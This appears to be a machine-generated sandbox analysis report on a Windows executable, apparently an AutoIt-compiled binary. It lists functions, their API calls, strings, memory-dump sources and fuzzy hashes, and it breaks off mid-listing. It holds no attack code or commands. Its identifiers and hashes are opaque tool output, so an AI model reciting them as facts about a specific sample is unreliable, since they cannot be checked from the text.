                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0134E9FC, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VariantInit.OLEAUT32(00000000), ref: 0134EA43
                                            • VariantCopy.OLEAUT32(00000000), ref: 0134EA4D
                                            • VariantClear.OLEAUT32 ref: 0134EA5A
                                            • VariantTimeToSystemTime.OLEAUT32 ref: 0134EBF3
                                            • __swprintf.LIBCMT ref: 0134EC20
                                            • VariantInit.OLEAUT32(00000000), ref: 0134ECDB
                                            Strings
                                            • %4d%02d%02d%02d%02d%02d, xrefs: 0134EC1A
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                            • String ID: %4d%02d%02d%02d%02d%02d
                                            • API String ID: 2441338619-1568723262
                                            • Opcode ID: 6729996a6faec9603dd3c2ba19a763e786497d0409a122b4dd22c757366213ef
                                            • Instruction ID: 5221cbe426733c2c200d8e11879755acd99b4b41f7d90203c85dd748286b9b30
                                            • Opcode Fuzzy Hash: 6729996a6faec9603dd3c2ba19a763e786497d0409a122b4dd22c757366213ef
                                            • Instruction Fuzzy Hash: ABA1D776A005158BDB209F59E4C066AFBF4FF54325F0489BEDD899B300C736A895DBE0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012F9400, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            • InterlockedIncrement.KERNEL32(01397F04), ref: 0131C5DF
                                            • InterlockedDecrement.KERNEL32(01397F04), ref: 0131C5FD
                                            • Sleep.KERNEL32(0000000A), ref: 0131C605
                                            • InterlockedIncrement.KERNEL32(01397F04), ref: 0131C610
                                            • InterlockedDecrement.KERNEL32(01397F04), ref: 0131C6C2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Interlocked$DecrementIncrement$Sleep
                                            • String ID: @COM_EVENTOBJ
                                            • API String ID: 327565842-2228938565
                                            • Opcode ID: 99d860d65244f322f5ceccd1cb8e30da5b9d4e9954bf7bcc6e1e3cab5d415062
                                            • Instruction ID: 0d4ebb8a9834c12f0a6bc8041e6e28af0013f34dc2519bc7ee91ac8638fafea2
                                            • Opcode Fuzzy Hash: 99d860d65244f322f5ceccd1cb8e30da5b9d4e9954bf7bcc6e1e3cab5d415062
                                            • Instruction Fuzzy Hash: 22D1DE7191020ACFDF15EF98C884BEEB7B4FF54318F208569E6066B285C775AD4ACB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0135B9C2, Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 308COMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 0135BA14
                                            • VariantInit.OLEAUT32(?), ref: 0135BAE4
                                              • Part of subcall function 01341AB8: GetLastError.KERNEL32(?,?,00000000), ref: 01341B16
                                              • Part of subcall function 01341AB8: VariantCopy.OLEAUT32(?,?), ref: 01341B6E
                                              • Part of subcall function 01341AB8: VariantCopy.OLEAUT32(-00000068,?), ref: 01341B84
                                              • Part of subcall function 01341AB8: VariantCopy.OLEAUT32(-00000088,?), ref: 01341B9D
                                              • Part of subcall function 01341AB8: VariantClear.OLEAUT32(-00000058), ref: 01341C17
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Variant$Copy$ClearErrorInitLast_memset
                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                            • API String ID: 530611519-625585964
                                            • Opcode ID: 7453cfdc295231bc82c49ab974b26c1a8a1a72a876a8c272538d8baf0ea1cd53
                                            • Instruction ID: 63f064237149724c444ed736ad1bc36d3eb5f8bf712ef26d43c924baab893dc4
                                            • Opcode Fuzzy Hash: 7453cfdc295231bc82c49ab974b26c1a8a1a72a876a8c272538d8baf0ea1cd53
                                            • Instruction Fuzzy Hash: E7A17572A40209ABDB10DF98DCC4EEEB7B9FF88718F50452DFA04AB244D7719945CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012F1F20, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 240COMMON
                                            Download Yara Rule
                                            APIs
                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 012F1F76
                                            • DestroyWindow.USER32(?), ref: 01316EC0
                                            • UnregisterHotKey.USER32(?), ref: 01316EE7
                                            • FreeLibrary.KERNEL32(?), ref: 01316F8F
                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 01316FC0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                            • String ID: close all
                                            • API String ID: 4174999648-3243417748
                                            • Opcode ID: 1c5aee3a9c954b4d5dd13d79e1f94a7322e37679aacefd496101c075cc6252fe
                                            • Instruction ID: 81b5abb875abf14869b0448652f599959e7abc462947e819136ec5b303ee1096
                                            • Opcode Fuzzy Hash: 1c5aee3a9c954b4d5dd13d79e1f94a7322e37679aacefd496101c075cc6252fe
                                            • Instruction Fuzzy Hash: 5FA16BB5620202CFD725EF68C986B6AF7A8BF14308F5046ACD60967254CB74AD5ACF90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01323D83, Relevance: 12.1, APIs: 8, Instructions: 107COMMON
                                            Download Yara Rule
                                            APIs
                                            • EnumProcesses.PSAPI(?,00000800,?,?,01333C4D,?,?,?,01398178), ref: 01323DA0
                                            • OpenProcess.KERNEL32(00000410,00000000,?,?,?,01398178), ref: 01323DFE
                                            • EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 01323E11
                                            • GetModuleBaseNameW.PSAPI(00000000,?,?,00000104), ref: 01323E28
                                            • __wsplitpath.LIBCMT ref: 01323E52
                                            • _wcscat.LIBCMT ref: 01323E65
                                            • __wcsicoll.LIBCMT ref: 01323E75
                                            • CloseHandle.KERNEL32(00000000), ref: 01323EAD
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: EnumProcess$BaseCloseHandleModuleModulesNameOpenProcesses__wcsicoll__wsplitpath_wcscat
                                            • String ID:
                                            • API String ID: 2903788889-0
                                            • Opcode ID: f933b4c0cd02eba07b1c6712870c5a9666c53d7ec909d0e369688c94bfb5a2a4
                                            • Instruction ID: fc4844283ba986c3d9dc47d5b823684f0218eca12325904efa9a009aea25a210
                                            • Opcode Fuzzy Hash: f933b4c0cd02eba07b1c6712870c5a9666c53d7ec909d0e369688c94bfb5a2a4
                                            • Instruction Fuzzy Hash: 0F318376A00119AFDB11DFA4DC84EEFB7BDFF9C304F104195EA0997240DA75EA858BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01369705, Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 349COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Variant$Copy$ClearErrorLast
                                            • String ID: NULL Pointer assignment$Not an Object type
                                            • API String ID: 2487901850-572801152
                                            • Opcode ID: 07acf52786a5abb155e757dd75c80e16c39cbc5445ef6d3629fc17f7d44a1695
                                            • Instruction ID: 63c61e6285a3d5240bbce16757b19f9ad807d7268c9900e7ef33e547974c4958
                                            • Opcode Fuzzy Hash: 07acf52786a5abb155e757dd75c80e16c39cbc5445ef6d3629fc17f7d44a1695
                                            • Instruction Fuzzy Hash: 17C18475A0020A9FEF14DF98C885FEEBBBDFB44308F10C559EA05AB245D7759984CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012FF540, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 89COMMON
                                            Download Yara Rule
                                            APIs
                                            • _strlen.LIBCMT ref: 012FF548
                                              • Part of subcall function 012FF700: _memset.LIBCMT ref: 012FF708
                                              • Part of subcall function 012FF570: _memmove.LIBCMT ref: 012FF5B9
                                              • Part of subcall function 012FF570: _memmove.LIBCMT ref: 012FF5D3
                                            • _memset.LIBCMT ref: 012FF663
                                            • _memset.LIBCMT ref: 012FF66D
                                            • _memset.LIBCMT ref: 012FF67A
                                            • _sprintf.LIBCMT ref: 012FF69E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: _memset$_memmove$_sprintf_strlen
                                            • String ID: %02X
                                            • API String ID: 1823384282-436463671
                                            • Opcode ID: 681167b8aa1462daade51408fa220cd853a20461fe58047b0d4a6de5fc1e56f3
                                            • Instruction ID: cbfbf9ee07ed60e960560239576f23d9b4d0e3b580c7668450fec16af7eaf742
                                            • Opcode Fuzzy Hash: 681167b8aa1462daade51408fa220cd853a20461fe58047b0d4a6de5fc1e56f3
                                            • Instruction Fuzzy Hash: 9D21F573B502193AD715A66D9C95BABF3DCAF60644F10007AE605E7380EEA4AE0883A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01334AE1, Relevance: 9.2, APIs: 6, Instructions: 163COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: _wcscpy$_wcscat
                                            • String ID:
                                            • API String ID: 2037614760-0
                                            • Opcode ID: c75dba6e614116b94f097de9b348c993c97bec51e850f236bb972012156e9411
                                            • Instruction ID: 2c5bffa1255a2947a6ac18a2469cd07f47e90c6f8587dc376c5f987940822d1e
                                            • Opcode Fuzzy Hash: c75dba6e614116b94f097de9b348c993c97bec51e850f236bb972012156e9411
                                            • Instruction Fuzzy Hash: 00416B315001296ACF39EF5CD8D0AFF77A8EFE6318F40005AED8257212D7259996C3E9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01341AB8, Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetLastError.KERNEL32(?,?,00000000), ref: 01341B16
                                            • VariantCopy.OLEAUT32(?,?), ref: 01341B6E
                                            • VariantCopy.OLEAUT32(-00000068,?), ref: 01341B84
                                            • VariantCopy.OLEAUT32(-00000088,?), ref: 01341B9D
                                            • VariantClear.OLEAUT32(-00000058), ref: 01341C17
                                            • SysAllocString.OLEAUT32(00000000), ref: 01341C30
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Variant$Copy$AllocClearErrorLastString
                                            • String ID:
                                            • API String ID: 960795272-0
                                            • Opcode ID: c8f778f0de7c5a1b940605163b445a1e3c66821901a9c1a760d5f68eea8266b0
                                            • Instruction ID: deb6f0f08caa747480939789d62ef997740c30ef4d266b0e65623c3671ea6eb9
                                            • Opcode Fuzzy Hash: c8f778f0de7c5a1b940605163b445a1e3c66821901a9c1a760d5f68eea8266b0
                                            • Instruction Fuzzy Hash: BD519C75A1020A9FCB24DF68D880BAAB7F9FF58304F10816EE905AB350D775ED45CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01323187, Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,01398178), ref: 0132319E
                                            • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,01398178), ref: 013231B9
                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,01398178), ref: 013231C3
                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,01398178), ref: 013231CB
                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,01398178), ref: 013231D5
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                            • String ID:
                                            • API String ID: 2833360925-0
                                            • Opcode ID: 24370679369f5079afc7d03481b114b0c61b9be686a6e7b9627434616662378e
                                            • Instruction ID: 4170480660da965954f29402d15530b4c9043656a29927a279af5ad58f02ad48
                                            • Opcode Fuzzy Hash: 24370679369f5079afc7d03481b114b0c61b9be686a6e7b9627434616662378e
                                            • Instruction Fuzzy Hash: BB119336D0422DABCF10AF99E9049EEBB78FF49722F014555EA05A3248DB359501CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01306FA5, Relevance: 9.0, APIs: 6, Instructions: 47COMMON
                                            Download Yara Rule
                                            APIs
                                            • __getptd.LIBCMT ref: 01306FB1
                                              • Part of subcall function 0130798C: __getptd_noexit.LIBCMT ref: 0130798F
                                              • Part of subcall function 0130798C: __amsg_exit.LIBCMT ref: 0130799C
                                            • __amsg_exit.LIBCMT ref: 01306FD1
                                            • __lock.LIBCMT ref: 01306FE1
                                            • InterlockedDecrement.KERNEL32(?), ref: 01306FFE
                                            • _free.LIBCMT ref: 01307011
                                            • InterlockedIncrement.KERNEL32(011817D8), ref: 01307029
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                            • String ID:
                                            • API String ID: 3470314060-0
                                            • Opcode ID: f5c75732128fb58da6980fb431ef43fa36a44807d6f2a3cab9f92e46892f35d9
                                            • Instruction ID: 34c2dbde8385fda25cf05f15f59cb5c3556b65f9edf32179789b135af82799c5
                                            • Opcode Fuzzy Hash: f5c75732128fb58da6980fb431ef43fa36a44807d6f2a3cab9f92e46892f35d9
                                            • Instruction Fuzzy Hash: 6701C076901B229BE777BB2C9425B5D7BE4BF04728F040209E580A72C5CB34B995DBD1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012FF010, Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON
                                            Download Yara Rule
                                            APIs
                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 012FF048
                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 012FF050
                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 012FF05B
                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 012FF066
                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 012FF06E
                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 012FF076
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Virtual
                                            • String ID:
                                            • API String ID: 4278518827-0
                                            • Opcode ID: 67a06f44fdf5ce135e7de30c95a6e596d140a8b82eb43195a4042eca82d5aaea
                                            • Instruction ID: 69b1bdb76c168ef36ddd19f40183760fe9d33909d636647e2181b98c94ad037a
                                            • Opcode Fuzzy Hash: 67a06f44fdf5ce135e7de30c95a6e596d140a8b82eb43195a4042eca82d5aaea
                                            • Instruction Fuzzy Hash: D3016770106B88ADD3309F668C84B43FEF8EF95704F01490DD1D507A42C6B5A84CCB69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0133B5C7, Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • InterlockedExchange.KERNEL32(?,?), ref: 0133B5E1
                                            • EnterCriticalSection.KERNEL32(?), ref: 0133B5F2
                                            • TerminateThread.KERNEL32(?,000001F6), ref: 0133B600
                                            • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0133B60E
                                              • Part of subcall function 013225E5: CloseHandle.KERNEL32(00000000,00000000,?,0133B61A,00000000,?,000003E8,?,000001F6), ref: 013225F3
                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 0133B623
                                            • LeaveCriticalSection.KERNEL32(?), ref: 0133B62A
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                            • String ID:
                                            • API String ID: 3495660284-0
                                            • Opcode ID: 1df57bbfb5bdf2995bf499ed91ea5a33759fc311dd08912dacae516c332ead05
                                            • Instruction ID: 02e871f9566d7d5ef2a50886a69f27364d6d144a413c408341af3b05f08be493
                                            • Opcode Fuzzy Hash: 1df57bbfb5bdf2995bf499ed91ea5a33759fc311dd08912dacae516c332ead05
                                            • Instruction Fuzzy Hash: 26F0AF72141201BBD270AF64EC88DABB77CFF88321F400526F60282555CB34E411CBB1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0134F9B8, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 0134FA20
                                            • GetMenuItemInfoW.USER32 ref: 0134FA3B
                                            • DeleteMenu.USER32(?,?,00000000), ref: 0134FA8C
                                            • DeleteMenu.USER32(00000000,?,00000000), ref: 0134FADF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Menu$Delete$InfoItem_memset
                                            • String ID: 0
                                            • API String ID: 1173514356-4108050209
                                            • Opcode ID: f91f17393052aa918db7bad0853aa9bbce2db3f7e2fb04763017611e654e636e
                                            • Instruction ID: a2b3df9826acabd4ade717cbfd5c3b102162431c787401c03c46d082a51af999
                                            • Opcode Fuzzy Hash: f91f17393052aa918db7bad0853aa9bbce2db3f7e2fb04763017611e654e636e
                                            • Instruction Fuzzy Hash: DD417171604302ABE310DF2CD844B1BB7EDAF95328F18862DF9A59B281D770E8458BA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0130F619, Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                            Download Yara Rule
                                            APIs
                                            • _malloc.LIBCMT ref: 0130F627
                                              • Part of subcall function 013034DB: __FF_MSGBANNER.LIBCMT ref: 013034F4
                                              • Part of subcall function 013034DB: __NMSG_WRITE.LIBCMT ref: 013034FB
                                              • Part of subcall function 013034DB: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,01306A35,?,00000001,?,?,01308179,00000018,0137D180,0000000C,01308209), ref: 01303520
                                            • _free.LIBCMT ref: 0130F63A
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AllocateHeap_free_malloc
                                            • String ID:
                                            • API String ID: 1020059152-0
                                            • Opcode ID: 30bd0a029e36c39ad998902581281472c0f56455547c3ec49154961fb1f2744b
                                            • Instruction ID: dc7229e673a925de3b58e5e654b56d1cfc0a664df8be65fb6652736f057b406f
                                            • Opcode Fuzzy Hash: 30bd0a029e36c39ad998902581281472c0f56455547c3ec49154961fb1f2744b
                                            • Instruction Fuzzy Hash: 5911913254561EABDB332B7CAC2465A3BDCEF547B8F218425E8889A1E0DB30D841C7A4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01307726, Relevance: 7.5, APIs: 5, Instructions: 34COMMON
                                            Download Yara Rule
                                            APIs
                                            • __getptd.LIBCMT ref: 01307732
                                              • Part of subcall function 0130798C: __getptd_noexit.LIBCMT ref: 0130798F
                                              • Part of subcall function 0130798C: __amsg_exit.LIBCMT ref: 0130799C
                                            • __getptd.LIBCMT ref: 01307749
                                            • __amsg_exit.LIBCMT ref: 01307757
                                            • __lock.LIBCMT ref: 01307767
